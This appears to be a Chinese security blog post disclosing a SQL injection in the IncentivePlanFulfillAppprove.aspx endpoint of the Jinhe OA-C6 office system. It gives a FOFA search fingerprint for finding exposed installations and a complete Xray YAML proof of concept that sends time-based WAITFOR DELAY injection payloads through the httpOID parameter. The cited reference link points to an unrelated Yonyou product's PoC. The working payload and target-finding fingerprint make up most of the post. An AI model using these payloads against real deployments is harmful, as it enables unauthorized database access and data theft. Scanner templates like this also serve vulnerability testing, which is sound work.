金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞

  参考链接:

 https://github.com/wy876/POC/blob/1a7300f4f0793a08d1255a474e71a4854613ffd2/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8CRM%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3setremindtoold.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

漏洞介绍:

 

金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞

 

 

资产指纹:

 

app="金和网络-金和OA"

 Xray-poc:

 

复制代码
name: poc-yaml-jinhe-oa-c6-incentiveplanfulfillappprove-sqli
transport: http
set:
  sleepSecond1: randomInt(6, 8)
  sleepSecond2: randomInt(3, 5)
rules:
  r0:
    request:
      method: GET
      path: /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:0'--
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: >-
      response.status == 200 && response.headers["Content-Length"]=="38"
    output:
      undelayedLantency: response.latency
  r1:
    request:
      method: GET
      path: /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:{{sleepSecond1}}'--
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: >-
      response.latency - undelayedLantency >= sleepSecond1 * 1000 - 1000 && response.status == 200 && response.headers["Content-Length"]=="38"
  r2:
    request:
      method: GET
      path: /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:{{sleepSecond2}}'--
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: >-
      response.latency - undelayedLantency >= sleepSecond2 * 1000 - 1000 && response.status == 200 && response.headers["Content-Length"]=="38"
expression: r0() && r1() && r2()
detail:
  author: Cysec
  links:
    - https://github.com/wy876/POC/blob/1a7300f4f0793a08d1255a474e71a4854613ffd2/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8CRM%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3setremindtoold.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  description: 金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞
  fofakewrods: app="金和网络-金和OA"
复制代码

 

posted @   Cysec  阅读(23)  评论(0编辑  收藏  举报
相关博文:
· 蓝凌EIS智慧协同平台 fi_message_receiver.aspx SQL注入漏洞(CVE-2025-22214)
· CTF-Web培训章节-Web应用权限安全
· 学习笔记-B/S - Exploits
· 用友U8 OA test.jsp SQL注入漏洞
· 泛微E-Cology WorkflowCenterTreeData SQL注入漏洞
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 单线程的Redis速度为什么快?
· SQL Server 2025 AI相关能力初探
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 展开说说关于C#中ORM框架的用法!
点击右上角即可分享
微信分享提示